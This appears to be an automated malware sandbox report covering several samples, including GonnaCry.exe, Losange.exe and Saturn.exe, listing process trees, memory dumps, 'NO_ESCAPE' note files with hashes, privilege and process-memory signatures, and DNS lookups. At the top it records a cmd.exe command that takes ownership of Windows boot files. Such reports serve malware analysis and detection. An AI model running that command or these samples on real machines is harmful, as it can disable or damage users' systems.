"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
Network
Files
memory/2740-0-0x0000000001160000-0x0000000001170000-memory.dmp
memory/2740-1-0x0000000074140000-0x000000007482E000-memory.dmp
memory/2740-2-0x0000000001090000-0x00000000010D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
| MD5 | 21ad42bd4156f914d3a265823a1c269c |
| SHA1 | 4129bc994a0947b38e3bac2aeabc8e2fbdbd503f |
| SHA256 | 680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2 |
| SHA512 | 7ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a |
memory/2740-13523-0x0000000074140000-0x000000007482E000-memory.dmp
memory/2740-19154-0x0000000001090000-0x00000000010D0000-memory.dmp
memory/2740-80006-0x0000000001090000-0x00000000010D0000-memory.dmp
memory/2740-80028-0x0000000001090000-0x00000000010D0000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 228
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\GonnaCry.exe
"C:\Users\Admin\AppData\Local\Temp\GonnaCry.exe"
Network
Files
memory/2020-0-0x00000000003B0000-0x00000000004BE000-memory.dmp
memory/2020-1-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp
memory/2020-2-0x000000001B340000-0x000000001B3C0000-memory.dmp
C:\Users\Admin\Desktop\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
| MD5 | 7f0df170f9cea3f0bedc79894eb44bdf |
| SHA1 | 79a083f09bf614d80543d0c455bb27b031da8adf |
| SHA256 | 1d9712c98621bfda7f5247f6fd6ef93165db44710685438cf27a3fe5ecc1e738 |
| SHA512 | f3bb9891ae73a4ce45894b30edf753007505d6afce716d1589750721c143e8b483219196d8c6a39d56496e4b7f4b76e64fa85a5c1d000aa0bb9d1224889f9d1c |
memory/2020-803-0x000000001B340000-0x000000001B3C0000-memory.dmp
memory/2020-804-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Losange.exe
"C:\Users\Admin\AppData\Local\Temp\Losange.exe"
Network
Files
memory/2168-0-0x000000013F2B0000-0x000000013F2D6000-memory.dmp
memory/2168-1-0x000000013F2B0000-0x000000013F2D6000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
151s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Saturn.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Saturn.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3780 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3f4 0x40c
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$1\1337\php5ts.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$1\1337\php5ts.dll,#1